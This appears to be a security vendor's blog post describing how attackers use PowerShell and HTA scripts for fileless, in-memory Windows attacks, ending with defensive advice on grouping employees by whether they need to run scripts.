Attackers always seek out new ways to evade detection. As most endpoint security products handle file-based attacks relatively well, scripts are an excellent way for attackers to avoid making changes to a disk, thus bypassing the threat detection capabilities of most products. In today’s threat landscape, scripts provide initial access, enable evasion, and facilitate lateral movements post-infection.
How attackers use scripts
Payload delivery and lateral movement follow a successful script-initiated infection. The payload performs actions desired by the attacker, such as information collection, file encryption, or backdoor communication. At the same time, lateral movement leads to infection of additional computers within the network.
Script-based attacks run on virtually all Windows systems, increasing the potential attack surface and the chance of infection. One major drawback of script-based attacks is that, unless deployed via an exploit, user interaction is required for the script to run.
Many types of malware use scripts. For instance, a script that downloads a PE file can either save it to disk or run it from memory, depending on its level of sophistication. The script can also perform additional malicious actions, such as collecting information about the victim, from the computer name to saved passwords.
PowerShell is a framework used for configuration management and task automation, with a command-line shell and scripting language. PowerShell provides access to Microsoft Windows Management Instrumentation (WMI) and Component Object Model (COM), which makes it a useful and versatile tool for system administrators automating IT management processes, but also for attackers seeking a foothold in the system.
A malicious file loader using PowerShell
Attackers use poweshell in their attacks to load malware directly in memory without writing to disk, thus bypassing many endpoint security products. Attackers also use PowerShell to automate data exfiltration and infection processes using frameworks such as Metasploit or PowerSploit.
Additional script-based threats
HTML application (HTA) is a Microsoft Windows file meant to run on Internet Explorer, which combines HTML code with Internet Explorer-supported scripts such as VBScript or JScript. HTA files execute through Microsoft HTA engine (mshta.exe) that has the local user’s privileges instead of Internet Explorer’s restricted privileges, with access to the filesystem and registry.
Malicious HTA files allow scripts to run the machine with local user privileges to download and run executables or additional scripts. Though considered an old attack vector, many script-based attacks continue to use HTA files. These files can be sent as attachments, downloaded by another script, or redirects from malicious websites.
Scripts to run in network is that safe ?
With script-based attacks on the rise, organizations need to be ready to combat attacks in which the entire attack sequence occurs in memory.
A basic first step any organization should consider is segmenting employees into several groups:
1. Running scripts is part of their day-to-day job
2. Running scripts is not common but might happen
3. There is no need to run scripts
With these foundational rules in place, organizations should seek out security solutions with specific capabilities that balance the ability to detect script-based attacks while allowing users who need to use scripts for their job function to do so without interruption.